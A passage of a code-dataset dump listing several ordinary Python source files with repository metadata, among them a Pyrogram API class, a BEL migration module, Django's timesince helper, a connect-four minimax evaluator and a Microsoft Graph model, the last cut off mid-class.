blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e966f04e9525fb6b367303324e44fbcbcfcfae94
|
221b2221703f9cddeee7054c5dc426b81a3f53bd
|
/venv/lib/python3.9/site-packages/pyrogram/raw/functions/langpack/get_language.py
|
e88bc93e119755902d6020efd7ffc9cf8d817575
|
[] |
no_license
|
ch3p4ll3/Royal-Racing-Bot
|
37c998a650078e4b5f5c3b34b8c081d52b018944
|
eab5baf61a9782fbedd42ddf35b7e11cbae9ec22
|
refs/heads/main
| 2023-06-26T03:34:58.104068
| 2021-07-30T17:36:14
| 2021-07-30T17:36:14
| 348,089,837
| 1
| 0
| null | 2021-03-20T11:32:46
| 2021-03-15T18:59:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,400
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetLanguage(TLObject):  # type: ignore
    """Telegram API method.

    Details:
        - Layer: ``122``
        - ID: ``0x6a596502``

    Parameters:
        lang_pack: ``str``
        lang_code: ``str``

    Returns:
        :obj:`LangPackLanguage <pyrogram.raw.base.LangPackLanguage>`
    """

    __slots__: List[str] = ["lang_pack", "lang_code"]

    ID = 0x6a596502
    QUALNAME = "functions.langpack.GetLanguage"

    def __init__(self, *, lang_pack: str, lang_code: str) -> None:
        self.lang_pack = lang_pack  # string
        self.lang_code = lang_code  # string

    @staticmethod
    def read(data: BytesIO, *args: Any) -> "GetLanguage":
        # This constructor carries no flags field: the two TL strings
        # follow the constructor ID directly.
        pack = String.read(data)
        code = String.read(data)
        return GetLanguage(lang_pack=pack, lang_code=code)

    def write(self) -> bytes:
        buffer = BytesIO()
        buffer.write(Int(self.ID, False))
        # No flags
        buffer.write(String(self.lang_pack))
        buffer.write(String(self.lang_code))
        return buffer.getvalue()
|
[
"slinucs@gmail.com"
] |
slinucs@gmail.com
|
8bcd712f4be349d7fe2b89d4ff19355202af1010
|
b2ba670818623f8ab18162382f7394baed97b7cb
|
/test-data/AndroidSlicer/Chart/DD/8.py
|
09e5ae21e49aeca31e6e629fd56dbf73b0e2b860
|
[
"MIT"
] |
permissive
|
hsumyatwin/ESDroid-artifact
|
012c26c40537a79b255da033e7b36d78086b743a
|
bff082c4daeeed62ceda3d715c07643203a0b44b
|
refs/heads/main
| 2023-04-11T19:17:33.711133
| 2022-09-30T13:40:23
| 2022-09-30T13:40:23
| 303,378,286
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 990
|
py
|
#start monkey test
# Jython monkeyrunner script: launches the WeightChart activity on a
# connected Android device/emulator and replays three recorded taps.
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint

# Block until a device is attached, then wrap it for easy (id-based) access.
device = MonkeyRunner.waitForConnection()
easy_device=EasyMonkeyDevice(device)

# Target application and activity under test.
package = 'es.senselesssolutions.gpl.weightchart'
activity ='es.senselesssolutions.gpl.weightchart.ChartActivity'
runComponent = package+'/'+activity

# Launch the chart screen and give it a second to settle.
device.startActivity(component=runComponent)
MonkeyRunner.sleep(1)

# Replay hard-coded tap coordinates (screen pixels), pausing between taps.
# NOTE(review): coordinates assume a specific device resolution — confirm.
device.touch(487,1689, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(1619,983, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(558,1730, 'DOWN_AND_UP')
|
[
"hsumyatwin@gmail.com"
] |
hsumyatwin@gmail.com
|
4a2c91451796f219d51b74f12ba3c8156185b68d
|
79041f273c057b2fbb115b35494b13250ac7a42c
|
/bel/lang/migrate_1_2.py
|
a33ee3c88896e423a30211e7b124513032101612
|
[
"Apache-2.0"
] |
permissive
|
belbio/bel
|
3786b65a10d44735407b0e79c8489bea1df58863
|
14ff8e543a679e7dfff3f38f31c0f91ffd55e4d8
|
refs/heads/master
| 2022-12-08T23:02:28.242510
| 2020-12-21T16:17:47
| 2020-12-21T16:17:47
| 116,027,945
| 6
| 2
|
Apache-2.0
| 2022-06-01T23:58:52
| 2018-01-02T15:14:32
|
Python
|
UTF-8
|
Python
| false
| false
| 6,958
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Migrate BEL from 1 to 2.0.0
#
# Standard Library
import json
# Third Party
from loguru import logger
# Local
import bel.belspec.crud
import bel.core.settings as settings
from bel.belspec.crud import get_enhanced_belspec
from bel.lang.ast import BELAst, Function, NSArg, StrArg
from bel.lang.belobj import BEL
# Module-level parser state shared by all functions below: resolve the
# latest BEL specification version once at import time, build a single
# reusable BEL parser, and fetch its enhanced specification lookup table.
version = bel.belspec.crud.get_latest_version()
bo = BEL("", version=version)
belspec = get_enhanced_belspec(bo.version)
def migrate(belstr: str) -> str:
    """Migrate a BEL 1 assertion string to BEL 2.0.0.

    Args:
        belstr: BEL 1 assertion

    Returns:
        The migrated assertion rendered as a BEL 2.0.0 string.
    """
    bo.parse(belstr)
    migrated = migrate_ast(bo.ast)
    return migrated.to_string()
def migrate_into_triple(belstr: str) -> str:
    """Migrate a BEL 1 assertion and render it as a BEL 2.0.0 SRO triple."""
    bo.parse(belstr)
    migrated = migrate_ast(bo.ast)
    return migrated.to_triple()
def migrate_ast(ast: BELAst) -> BELAst:
    """Migrate a parsed BEL 1 AST to BEL 2.0.0 in place.

    Bug fix: the original body ignored the *ast* parameter and always
    mutated the module-global ``bo.ast``. The parameter is now honored, so
    the function works on whatever AST it is handed; existing callers that
    pass ``bo.ast`` observe identical behavior.

    Args:
        ast: parsed BEL assertion AST (subject / relation / object)

    Returns:
        The same AST object, converted to BEL 2.0.0.
    """
    # Process Subject
    ast.subject = convert(ast.subject)

    # Process Object: it is either a plain term or a nested assertion.
    if ast.object:
        if ast.object.type == "BELAst":
            ast.object.subject = convert(ast.object.subject)
            if ast.object.object:
                ast.object.object = convert(ast.object.object)
        else:
            ast.object = convert(ast.object)

    return ast
def convert(ast):
    """Convert a BEL1 AST Function node (and its arguments, recursively)
    to the BEL2 form.

    Non-Function nodes pass through unchanged. Fix: removed a leftover
    debug ``print`` that wrote every activity node to stdout.
    """
    if ast and ast.type == "Function":

        # Activity function conversion, e.g. kin(p(...)) -> act(p(...), ma(kin))
        if (
            ast.name != "molecularActivity"
            and ast.name in belspec["namespaces"]["Activity"]["list"]
        ):
            ast = convert_activity(ast)
            return ast  # Otherwise - this will trigger on the BEL2 molecularActivity

        # translocation conversion
        elif ast.name in ["tloc", "translocation"]:
            ast = convert_tloc(ast)

        fus_flag = False
        for idx, arg in enumerate(ast.args):
            if arg.__class__.__name__ == "Function":

                # Fix substitution -> variation()
                if arg.name in ["sub", "substitution"]:
                    ast.args[idx] = convert_sub(arg)

                elif arg.name in ["trunc", "truncation"]:
                    ast.args[idx] = convert_trunc(arg)

                elif arg.name in ["pmod", "proteinModification"]:
                    ast.args[idx] = convert_pmod(arg)

                elif arg.name in ["fus", "fusion"]:
                    # Defer: fusion rewrites the parent's argument list.
                    fus_flag = True

                # Recursively process Functions
                ast.args[idx] = convert(ast.args[idx])

        if fus_flag:
            ast = convert_fus(ast)

    return ast
def convert_tloc(ast):
    """Convert a BEL1 tloc() to BEL2 by wrapping its two location
    arguments in fromLoc() / toLoc() functions."""
    src = ast.args[1]
    dst = ast.args[2]

    wrapped_from = Function("fromLoc", version=version, parent=ast)
    wrapped_from.add_argument(NSArg(src.namespace, src.value, parent=wrapped_from))

    wrapped_to = Function("toLoc", version=version, parent=ast)
    wrapped_to.add_argument(NSArg(dst.namespace, dst.value, parent=wrapped_to))

    ast.args[1] = wrapped_from
    ast.args[2] = wrapped_to
    return ast
def convert_activity(ast):
    """Convert a BEL1 activity function (e.g. kin()) to BEL2 act(..., ma(...)).

    The BEL1 activity name becomes a ma() string argument, and the
    activity's single term argument is re-parented onto the new act() node.
    Fix: removed a leftover debug ``print`` of the protein argument.
    """
    if len(ast.args) > 1:
        logger.error(f"Activity should not have more than 1 argument {ast.to_string()}")

    p_arg = ast.args[0]  # protein argument

    ma_arg = Function("ma", version=version)
    ma_arg.add_argument(StrArg(ast.name, ma_arg))

    # NOTE(review): this re-parenting is overridden two lines below by
    # change_parent_fn(ast); kept for behavior parity — confirm it is needed.
    p_arg.change_parent_fn(ma_arg)

    ast = Function("activity", version=version)
    p_arg.change_parent_fn(ast)
    ast.add_argument(p_arg)
    ast.add_argument(ma_arg)

    return ast
def convert_pmod(pmod):
    """Rewrite a BEL1 pmod() modification name to its BEL2 equivalent,
    leaving unknown names untouched."""
    mapping = belspec["bel1_migration"]["protein_modifications"]
    mod_name = pmod.args[0].value
    if mod_name in mapping:
        pmod.args[0].value = mapping[mod_name]
    return pmod
def convert_fus(ast):
    """Convert BEL1 fus() to BEL2 fus().

    Expects *ast* to be the enclosing p()/r()/g() function whose args are
    [NSArg of the 5' partner, fus(partner2, start?, end?), <trailing args>].
    Builds the BEL2 four-argument form
    fus(ns1:val1, "<prefix>1_<end1>", ns2:val2, "<prefix><start2>_?")
    and re-installs it as the first argument of *ast*.
    """
    # Coordinate prefix depends on the enclosing function type:
    # protein -> "p.", RNA -> "r.", gene -> "c.".
    parent_fn_name = ast.name_short
    prefix_list = {"p": "p.", "r": "r.", "g": "c."}
    prefix = prefix_list[parent_fn_name]

    # First fusion partner is the parent function's first argument.
    fus1_ns = ast.args[0].namespace
    fus1_val = ast.args[0].value

    # BEL1 fus() carries the second partner plus up to two breakpoints;
    # missing positions default to the "?" unknown marker.
    arg_fus = ast.args[1]
    fus_args = [None, "?", "?"]
    for idx, arg in enumerate(arg_fus.args):
        fus_args[idx] = arg

    fus2_ns = fus_args[0].namespace
    fus2_val = fus_args[0].value

    # Range strings: partner 1 runs from position 1 to its breakpoint,
    # partner 2 from its breakpoint to an unknown end ("?").
    if fus_args[1] == "?":
        fus1_range = fus_args[1]
    else:
        fus1_range = f'"{prefix}1_{fus_args[1].value}"'
    if fus_args[2] == "?":
        fus2_range = fus_args[2]
    else:
        fus2_range = f'"{prefix}{fus_args[2].value}_?"'

    fus = Function("fus", version=version, parent=ast)
    fus.args = [
        NSArg(fus1_ns, fus1_val, fus),
        StrArg(fus1_range, fus),
        NSArg(fus2_ns, fus2_val, fus),
        StrArg(fus2_range, fus),
    ]

    # Remove BEL
    # Drop the two consumed arguments and splice the new fus() in front
    # of any remaining ones (e.g. a trailing pmod()).
    ast_args = ast.args
    ast_args.pop(0)
    ast_args.pop(0)
    if ast_args == [None]:
        ast_args = []
    ast.args = []
    ast.add_argument(fus)
    if len(ast_args) > 0:
        ast.args.extend(ast_args)
    return ast
def convert_sub(sub):
    """Convert a BEL1 sub() amino-acid substitution into a BEL2 var()
    carrying the HGVS-style description."""
    ref_aa, pos, new_aa = sub.args

    # HGVS coordinate prefix chosen from the enclosing function type.
    prefix_by_fn = {"p": "p.", "r": "r.", "g": "c."}
    prefix = prefix_by_fn[sub.parent_function.name_short]

    short = belspec["namespaces"]["AminoAcid"]["to_short"]
    hgvs = f'"{prefix}{short[ref_aa.value]}{pos.value}{short[new_aa.value]}"'

    var_fn = Function("var", version=version)
    var_fn.add_argument(StrArg(hgvs, var_fn))
    return var_fn
def convert_trunc(trunc):
    """Convert a BEL1 trunc() into a BEL2 var() with a descriptive string.

    The coordinate prefix is computed (the dict lookup validates the parent
    function type) but — matching the original — is not used in the output.
    """
    prefix_by_fn = {"p": "p.", "r": "r.", "g": "c."}
    _prefix = prefix_by_fn[trunc.parent_function.name_short]

    var_fn = Function("var", version=version)
    var_fn.add_argument(StrArg(f'"truncated at {trunc.args[0].value}"', var_fn))
    return var_fn
def main():
    """Ad-hoc smoke test: migrate a sample BEL1 assertion and print it."""
    # Local
    import bel.lang.migrate_1_2

    # NOTE: the earlier bel1 assignments are deliberately overridden; only
    # the last one is migrated. The commented pairs record the expected
    # BEL2 output for each sample input.
    bel1 = "kin(p(HGNC:BRAF))"
    bel1 = "p(HGNC:PIK3CA, sub(E, 545, K))"
    # bel2 = 'p(HGNC:PIK3CA, var(p.Glu545Lys))'
    bel1 = "r(HGNC:BCR, fus(HGNC:JAK2, 1875, 2626), pmod(P))"
    bel2 = 'r(fus(HGNC:BCR, "r.1_1875", HGNC:JAK2, "r.2626_?"), pmod(Ph))'
    # bel1 = 'p(HGNC:MAPK1, pmod(P, Thr, 185))'
    # bel2 = 'p(HGNC:MAPK1, pmod(Ph, Thr, 185))'
    # bel1 = 'tloc(p(HGNC:EGFR), MESHCL:Cytoplasm, MESHCL:"Cell Nucleus")'
    # bel2 = 'tloc(p(HGNC:EGFR), fromLoc(MESHCL:Cytoplasm), toLoc(MESHCL:"Cell Nucleus"))'
    # bel1 = 'p(HGNC:ABCA1, trunc(1851))'
    # bel2 = 'p(HGNC:ABCA1, var("truncated at 1851"))'
    bel2 = bel.lang.migrate_1_2.migrate(bel1)
    print("BEL2", bel2)
|
[
"william.s.hayes@gmail.com"
] |
william.s.hayes@gmail.com
|
206146ddffedd60bf477a416ab75b3c14e9f720f
|
758bf41e46a3093f4923af603f1f7f8063408b9c
|
/website/testFromRemoteRepo/_bsch3398/museum/python/django/utils/timesince.py
|
55e53c65cfc601a4fa7399ed0b4d33d81b8588c3
|
[] |
no_license
|
mpetyx/mpetyx.com
|
4033d97b21c9227a6ba505980fd0c1b57254e8fb
|
d50c379b4fe09e0135656573f7049225fc90ae36
|
refs/heads/master
| 2021-01-10T19:50:15.488371
| 2014-01-22T09:04:14
| 2014-01-22T09:04:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,698
|
py
|
import datetime
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
    """
    Takes two datetime objects and returns the time between d and now
    as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
    then "0 minutes" is returned.

    Units used are years, months, weeks, days, hours, and minutes.
    Seconds and microseconds are ignored. Up to two adjacent units will be
    displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
    possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.

    Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
    """
    # Unit table: (seconds per unit, pluralizing name), largest first.
    # Months are approximated as 30 days and years as 365 days.
    chunks = (
        (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
        (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
        (60 * 60 * 24 * 7, lambda n: ungettext('week', 'weeks', n)),
        (60 * 60 * 24, lambda n: ungettext('day', 'days', n)),
        (60 * 60, lambda n: ungettext('hour', 'hours', n)),
        (60, lambda n: ungettext('minute', 'minutes', n))
    )
    # Convert datetime.date to datetime.datetime for comparison.
    if not isinstance(d, datetime.datetime):
        d = datetime.datetime(d.year, d.month, d.day)
    if now and not isinstance(now, datetime.datetime):
        now = datetime.datetime(now.year, now.month, now.day)
    # Default 'now' to the current time, in d's timezone when d is aware.
    if not now:
        if d.tzinfo:
            now = datetime.datetime.now(LocalTimezone(d))
        else:
            now = datetime.datetime.now()
    # ignore microsecond part of 'd' since we removed it from 'now'
    delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
    since = delta.days * 24 * 60 * 60 + delta.seconds
    if since <= 0:
        # d is in the future compared to now, stop processing.
        return u'0 ' + ugettext('minutes')
    # Find the largest unit with a non-zero count; 'i', 'seconds', 'name'
    # and 'count' are deliberately used after the loop (the last
    # iteration's values apply when no unit matched).
    for i, (seconds, name) in enumerate(chunks):
        count = since // seconds
        if count != 0:
            break
    s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
    if i + 1 < len(chunks):
        # Now get the second item: the next-smaller unit of the remainder.
        seconds2, name2 = chunks[i + 1]
        count2 = (since - (seconds * count)) // seconds2
        if count2 != 0:
            s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
    return s
def timeuntil(d, now=None):
    """
    Like timesince, but returns a string measuring the time until
    the given time (i.e. with the arguments swapped).
    """
    if not now:
        # Use d's timezone when it is aware; datetime.now(None) is the
        # same naive local time as datetime.now().
        tz = LocalTimezone(d) if getattr(d, 'tzinfo', None) else None
        now = datetime.datetime.now(tz)
    return timesince(now, d)
|
[
"mpetyx@gmail.com"
] |
mpetyx@gmail.com
|
df004da63a64bed312c2d45ad9d337333d93d167
|
2160b580f64693eb8a27afc58dbdff9363247e3f
|
/doc2dash/parsers/__init__.py
|
164faf6c4ec769dfc84c4a88ad42ba11ba703c48
|
[
"MIT"
] |
permissive
|
pombredanne/doc2dash
|
fa65fc4428d03c1be9dbdfdb5b311d37c439c3ae
|
c2f342a74b596d3e0470f9ac69f73c9aef1fc7bd
|
refs/heads/master
| 2021-01-16T19:30:41.265173
| 2014-08-14T08:12:10
| 2014-08-14T08:13:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from __future__ import absolute_import, division, print_function
from . import pydoctor, sphinx, intersphinx
# Parser classes tried in priority order by get_doctype(): intersphinx is
# preferred over plain Sphinx, with PyDoctor as the final fallback.
DOCTYPES = [
    intersphinx.InterSphinxParser,
    sphinx.SphinxParser,
    pydoctor.PyDoctorParser,
]
def get_doctype(path):
    """
    Return the first parser class in DOCTYPES whose ``detect`` accepts
    *path*, or ``None`` when no parser recognizes it.
    """
    for parser in DOCTYPES:
        if parser.detect(path):
            return parser
    return None
|
[
"hs@ox.cx"
] |
hs@ox.cx
|
6cd48226c2b5daa5312ca2232f47327b3926aa63
|
7e6864c5c48317a590ed6cc9b2acb85754bcda3b
|
/app/bin/back_end_scripts/minimax.py
|
7a7839692657faffc8427321758349942d25078c
|
[
"MIT"
] |
permissive
|
michaelneuder/connect_four
|
f83d8c1adf03af14632ab1acb23cc79ea5a3f035
|
de2a1d7296ffddaee4282b722775225cdfbe6304
|
refs/heads/master
| 2021-01-20T10:06:56.505978
| 2017-06-05T23:04:34
| 2017-06-05T23:04:34
| 83,929,928
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,084
|
py
|
#!/usr/bin/env python3
import numpy as np
import random as rand
class minimax(object):
    """Connect-four board-evaluation helpers for a minimax AI.

    The board is a 6x7 array-like indexed ``[row, col]`` with row 0 at the
    top; cell values are 0 (empty) or a player color code (1 / 2).

    Fixes vs. the original:
    - ``find_twos_cols`` started its row scan at 0, so ``board[row-1]`` /
      ``board[row-2]`` used negative indices that wrap to the bottom of
      the board and produced spurious counts; the scan now starts at 2.
    - Removed leftover ``print('found')`` debug output in
      ``find_twos_diags``.
    """

    def __init__(self, current_board, move_number):
        self.board = current_board
        self.number_rows = 6
        self.number_cols = 7
        self.move_number = move_number
        # The twelve diagonals of length >= 4, cached as flat lists by
        # update_diags() so the two-in-a-row scan can treat them like rows.
        self.right_diag_1 = []
        self.right_diag_2 = []
        self.right_diag_3 = []
        self.right_diag_4 = []
        self.right_diag_5 = []
        self.right_diag_6 = []
        self.left_diag_1 = []
        self.left_diag_2 = []
        self.left_diag_3 = []
        self.left_diag_4 = []
        self.left_diag_5 = []
        self.left_diag_6 = []
        self.diag_set = []
        self.two_set = []
        self.update_diags()

    def update_diags(self):
        """Re-extract all 12 diagonals (length >= 4) from the board."""
        self.right_diag_1 = [self.board[3,0],self.board[2,1],self.board[1,2],self.board[0,3]]
        self.right_diag_2 = [self.board[4,0],self.board[3,1],self.board[2,2],self.board[1,3],
                             self.board[0,4]]
        self.right_diag_3 = [self.board[5,0],self.board[4,1],self.board[3,2],self.board[2,3],
                             self.board[1,4],self.board[0,5]]
        self.right_diag_4 = [self.board[5,1],self.board[4,2],self.board[3,3],self.board[2,4],
                             self.board[1,5],self.board[0,6]]
        self.right_diag_5 = [self.board[5,2],self.board[4,3],self.board[3,4],self.board[2,5],
                             self.board[1,6]]
        self.right_diag_6 = [self.board[5,3],self.board[4,4],self.board[3,5],self.board[2,6]]
        self.left_diag_1 = [self.board[3,6],self.board[2,5],self.board[1,4],self.board[0,3]]
        self.left_diag_2 = [self.board[4,6],self.board[3,5],self.board[2,4],self.board[1,3],
                            self.board[0,2]]
        self.left_diag_3 = [self.board[5,6],self.board[4,5],self.board[3,4],self.board[2,3],
                            self.board[1,2],self.board[0,1]]
        self.left_diag_4 = [self.board[5,5],self.board[4,4],self.board[3,3],self.board[2,2],
                            self.board[1,1],self.board[0,0]]
        self.left_diag_5 = [self.board[5,4],self.board[4,3],self.board[3,2],self.board[2,1],
                            self.board[1,0]]
        self.left_diag_6 = [self.board[5,3],self.board[4,2],self.board[3,1],self.board[2,0]]
        self.diag_set = [self.right_diag_1, self.right_diag_2, self.right_diag_3,
                         self.right_diag_4, self.right_diag_5, self.right_diag_6,
                         self.left_diag_1, self.left_diag_2, self.left_diag_3,
                         self.left_diag_4, self.left_diag_5, self.left_diag_6]

    def find_twos_rows(self, color):
        number_of_twos = 0
        '''
        checking for twos along the rows. this gets complicated, because we
        only want to count twos that could be part of a future connect four.
        thus we have to make sure that their is enough empty cells around each
        set of two before we count it.
        ----------------------------------------------------------------------
        these are the options: 0011, 0101, 0110, 1001, 1010, 1100
        '''
        # NOTE(review): the second and third elif share the same guard, so
        # the third branch is unreachable; find_twos_rows_test() below is
        # the simpler window-based reimplementation — confirm and prefer it.
        for row in range(self.number_rows):
            for col in range(self.number_cols-1):
                if( (col-2) > -1 and (col+2 >= self.number_cols or self.board[row][col+2] != color)):
                    if(self.board[row][col] == self.board[row][col+1] == color
                    and self.board[row][col-1] == self.board[row][col-2] == 0):
                        number_of_twos += 1
                elif( (col-1) > -1 and (col+2) < self.number_cols ):
                    if(self.board[row][col] == self.board[row][col+2] == color
                    and (self.board[row][col-1] == self.board[row][col+1] == 0)):
                        number_of_twos += 1
                elif( (col-1) > -1 and (col+2) < self.number_cols):
                    if(self.board[row][col] == self.board[row][col+1] == color
                    and (self.board[row][col-1] == self.board[row][col+2] == 0)):
                        number_of_twos += 1
                elif( (col+3) < self.number_cols):
                    if(self.board[row][col] == self.board[row][col+3] == color
                    and self.board[row][col+1] == self.board[row][col+2] == 0):
                        number_of_twos += 1
                    elif(self.board[row][col] == self.board[row][col+2] == color
                    and self.board[row][col+1] == self.board[row][col+3] == 0):
                        number_of_twos += 1
                    elif(self.board[row][col] == self.board[row][col+1] == color
                    and self.board[row][col+2] == self.board[row][col+3] == 0):
                        number_of_twos += 1
        return number_of_twos

    def find_twos_rows_test(self, color):
        '''
        checking for twos along the rows. this gets complicated, because we
        only want to count twos that could be part of a future connect four.
        thus we have to make sure that their is enough empty cells around each
        set of two before we count it.
        ----------------------------------------------------------------------
        these are the options: 0011, 0101, 0110, 1001, 1010, 1100
        '''
        # Window-based version: every horizontal window of 4 cells with
        # exactly two of our color and two empties is a potential four.
        number_of_twos = 0
        set_to_check = []
        for row in range(self.number_rows):
            for col in range(self.number_cols-3):
                set_to_check.append([self.board[row][col+i] for i in range(4)])
        for set_ in set_to_check:
            num_color = 0
            num_empty = 0
            for cell in set_:
                if(cell == 0):
                    num_empty += 1
                elif(cell == color):
                    num_color += 1
            if(num_color == num_empty == 2):
                number_of_twos += 1
        return number_of_twos

    def find_twos_cols(self, color):
        number_of_twos = 0
        '''
        checking for twos along the col. this is pretty easy as the only way a
        two in a row along a column can be apart of a connect four is if the piece
        immediately above the two is empty.
        '''
        # Bug fix: start at row 2 so board[row-1] / board[row-2] never use
        # negative indices (which wrap to the bottom row and produced
        # spurious counts). A pair in the top two rows cannot have an
        # empty cell above it anyway.
        for col in range(self.number_cols):
            for row in range(2, self.number_rows):
                if(self.board[row][col] == self.board[row-1][col] == color
                and self.board[row-2][col] == 0):
                    number_of_twos += 1
        return number_of_twos

    def find_twos_diags(self, color):
        '''
        this is similar to finding twos in rows. there are three options for
        two in a rows that have potential to be a win. 0011, 0110, 1100. these
        each are examined in the context of the diagonal. this is the reason
        that the diagonal lists are necessary
        '''
        number_of_twos = 0
        for diag in self.diag_set:
            diagonal_length = len(diag)
            for i in range(diagonal_length-1):
                # Pattern 1100 (pair followed by two empties).
                if( (i+3) < diagonal_length):
                    if(diag[i] == diag[i+1] == color and diag[i+2] == diag[i+3] == 0):
                        number_of_twos += 1
                # Pattern 0110 (pair flanked by empties).
                elif( (i-1) > -1 and (i+2) < diagonal_length):
                    if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i+2] == 0):
                        number_of_twos += 1
                # Pattern 0011 (two empties then the pair).
                elif( (i-2) > -1):
                    if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i-2] == 0):
                        number_of_twos += 1
        return number_of_twos

    def evaluate_board(self):
        # (2 in a rows)*10 + (3 in a rows)*1000 + (4 in a row)*100000
        # NOTE(review): the weighted formula above is not implemented yet;
        # the method currently returns a constant placeholder.
        evaluation = 10
        return evaluation
def main():
    """Exercise the minimax helpers on a small hand-built position."""
    print("\nminimax ai algorithm --- connect four\n")
    rows = [
        [0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0],
        [0, 0, 2, 0, 1, 2, 0],
        [0, 1, 2, 1, 2, 2, 2],
        [2, 1, 1, 2, 1, 1, 1],
    ]
    sample_board = np.array(rows)
    ai = minimax(sample_board, 16)
    print(ai.find_twos_rows_test(1))
|
[
"michael.neuder@gmail.com"
] |
michael.neuder@gmail.com
|
f69504729af79407f2cc3c37688aedfdbe190a0d
|
1719920a92f7194766624474b98d59ef8d6eddaf
|
/models/device_enrollment_configuration.py
|
9e22612e3cb2ffb4bf77a9608e129ccf5936870e
|
[
"MIT"
] |
permissive
|
MIchaelMainer/msgraph-v10-models-python
|
cfa5e3a65ba675383975a99779763211ed9fa0a9
|
adad66363ebe151be2332f3ef74a664584385748
|
refs/heads/master
| 2020-03-19T12:51:06.370673
| 2018-06-08T00:16:12
| 2018-06-08T00:16:12
| 136,544,573
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,747
|
py
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.enrollment_configuration_assignment import EnrollmentConfigurationAssignment
from datetime import datetime
from ..one_drive_object_base import OneDriveObjectBase
class DeviceEnrollmentConfiguration(OneDriveObjectBase):
    """Graph 'deviceEnrollmentConfiguration' entity.

    A thin wrapper over a wire-format dict (``self._prop_dict``): every
    property reads and writes the camelCase key used by the Graph API.
    """

    def __init__(self, prop_dict=None):
        # Bug fix: the original signature used a mutable default
        # (prop_dict={}), which made every default-constructed instance
        # share -- and mutate -- the same dict object.
        self._prop_dict = {} if prop_dict is None else prop_dict

    @property
    def display_name(self):
        """
        Gets and sets the displayName

        Returns:
            str:
                The displayName
        """
        if "displayName" in self._prop_dict:
            return self._prop_dict["displayName"]
        else:
            return None

    @display_name.setter
    def display_name(self, val):
        self._prop_dict["displayName"] = val

    @property
    def description(self):
        """
        Gets and sets the description

        Returns:
            str:
                The description
        """
        if "description" in self._prop_dict:
            return self._prop_dict["description"]
        else:
            return None

    @description.setter
    def description(self, val):
        self._prop_dict["description"] = val

    @property
    def priority(self):
        """
        Gets and sets the priority

        Returns:
            int:
                The priority
        """
        if "priority" in self._prop_dict:
            return self._prop_dict["priority"]
        else:
            return None

    @priority.setter
    def priority(self, val):
